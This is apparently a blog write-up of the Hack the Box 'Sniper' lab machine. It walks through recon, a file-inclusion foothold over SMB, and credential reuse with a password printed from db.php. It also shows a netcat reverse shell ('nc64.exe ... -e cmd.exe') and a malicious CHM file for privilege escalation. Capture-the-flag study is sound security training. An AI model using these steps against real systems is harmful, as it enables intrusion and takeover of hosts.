Cookie Consent by
Posts Hack the Box - Sniper

Hack the Box - Sniper


From an initial LFI/RFI foothold within the company website, to abusing malicious Windows help files, Sniper presents the story of a disgruntled developer and their middle finger to the Administrator/CEO on their way out. Sniper was a fun machine with a new angle on the RFI approach I had not used before and allowed me an opportunity to work with CHM files, something I previously also had not done.

Initial Recon

Let's start off this machine with an NMAP scan to see what we are working with.

root@kali:~/Desktop/HTB/Sniper# nmap -sV -sC -p-
Starting Nmap 7.70 ( ) at 2019-11-01 17:53 EDT
Stats: 0:02:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 46.77% done; ETC: 17:57 (0:02:19 remaining)
Stats: 0:02:48 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 83.17% done; ETC: 17:56 (0:00:34 remaining)
Stats: 0:04:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.85% done; ETC: 17:57 (0:00:00 remaining)
Nmap scan report for
Host is up (0.019s latency).
Not shown: 65530 filtered ports
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m46s, deviation: 0s, median: 7h00m46s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-11-02 00:58:03
|_  start_date: N/A

We boot up Burp and go take a look at the webpage. Interesting, looks like a company called "Sniper Co.".

Poking around the site and taking a look at Burp we find a few interesting things. First we see there is a /user/registration.php page.

Looks like we can register a user. Let's create a new test/test account and see if there is anything useful on the other side.

Bummer, doesn't seem like there is much else here even when poking at the source. Let's move on to the blog page. There seems to be an interesting way they load the different language files. We can give a local file inclusion angle a shot and see if we can get any information back. We choose a standard Windows file.

Alright, we are starting to make some progress. I tried kicking off an Apache instance locally and attempted transforming the LFI to an RFI. Unfortunately it was not calling back the files hosted on my local machine. A bit of digging later stumbled on to a post going into details of how to perform these types of RFI attacks leveraging a Samba instance and UNC paths rather than a regular HTTP address. The breakdown is essentially that PHP has allow_url_include set to off by default. By leveraging a UNC path rather than HTTP we can inject the remote location and get it called successfully.

Alright, getting our local Samba installation running and using a trusty WebShell manage to successfully get a foothold on the host! I skipped a few screenshots of getting the following steps ready but it boiled down to creating a new folder that our iusr had rights to then upload a netcat executable. From there we should be able to establish a shell connection to our host.

User exploitation

With our shell connection established we take a look at the directory and what we can see.

 Directory of C:\inetpub\wwwroot\user

10/01/2019  08:44 AM    <DIR>          .
10/01/2019  08:44 AM    <DIR>          ..
04/11/2019  05:15 PM               108 auth.php
04/11/2019  05:52 AM    <DIR>          css
04/11/2019  10:51 AM               337 db.php
04/11/2019  05:23 AM    <DIR>          fonts
04/11/2019  05:23 AM    <DIR>          images
04/11/2019  06:18 AM             4,639 index.php
04/11/2019  05:23 AM    <DIR>          js
04/11/2019  06:10 AM             6,463 login.php
04/08/2019  11:04 PM               148 logout.php
10/01/2019  08:42 AM             7,192 registration.php
08/14/2019  10:35 PM             7,004 registration_old123123123847.php
04/11/2019  05:23 AM    <DIR>          vendor
               7 File(s)         25,891 bytes
               7 Dir(s)  17,926,541,312 bytes free

There are a few files here that we didn't see in our initial web recon. Taking a poke inside a few and we find something quite interesting.

C:\inetpub\wwwroot\user>type db.php
type db.php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  echo "Failed to connect to MySQL: " . mysqli_connect_error();

Very interesting... looks like we have a password. Now let's find our username. A quick check under C:\Users and we see that there are two user directories: Administrator and Chris. Let's assume Chris is our user level access and attempt to pivot from iusr to Chris. Unlike a linux based "su username" Windows impersonation is a bit more involved. There is a good explanation of how to perform that on this post. So let's give that a shot.

$user = "Sniper\Chris"
$pass = ConvertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user,$pass)
Invoke-Command -Computer Sniper -ScriptBlock { mkdir C:\temp2 } -Credential $cred
PS C:\> cd temp2
cd temp2
PS C:\temp2> cp ..\temp\nc64.exe .
PS C:\temp2> Invoke-Command -Computer Sniper -ScriptBlock { C:\temp2\nc64.exe 31337 -e cmd.exe } -Credential $cred
Invoke-Command -Computer Sniper -ScriptBlock { C:\temp2\nc64.exe 31337 -e cmd.exe } -Credential $cred

And with our listening shell ready and waiting...

root@kali:~/Desktop/HTB/Sniper# nc -lnvp 31337
Listening on [] (family 2, port 31337)
Connection from 49742 received!
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.



 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640

 Directory of C:\Users\Chris\Desktop

04/11/2019  08:15 AM    <DIR>          .
04/11/2019  08:15 AM    <DIR>          ..
04/11/2019  08:15 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  17,985,708,032 bytes free

C:\Users\Chris\Desktop>type user.txt
type user.txt

No time to sleep we need to continue down the rabbit hole.

Root exploitation

If we take a look at Chris' files we notice something interesting in the downloads. There is a file: instructions.chm. I wasn't too familiar with the file format so a quick search later and quickly find out it's a help file format. We are able to get it decompiled to a readable format. Seems our Chris is not exactly happy with his current situation, nor is his opinion of the CEO too flaterring.

A bit more recon and we find a Docs folder under the C:\ drive. Seems our CEO was also not a great fan of Chris.

PS C:\Docs> type note.txt
Hi Chris,
	Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Sniper CEO.

So this seemed quite interesting. If we read between the lines we can assume that the CEO, assumingly the Administrator, is performing some form of processing based on a file we are supposed to put in this directory. Some searching around and I stumbled on to Nishang's github repo where he provided a utility to craft chm based exploits. I ended up having to open up my Windows VM but managed to get the file crafted.

Then if we move it over to C:\Docs and go check our temp2 folder, our root flag is present!

Just like that our journey with Sniper is done. Maybe we will have a sequel and see what ends up happening between the CEO and Chris. Thanks folks, until next time!

This post is licensed under CC BY 4.0 by the author.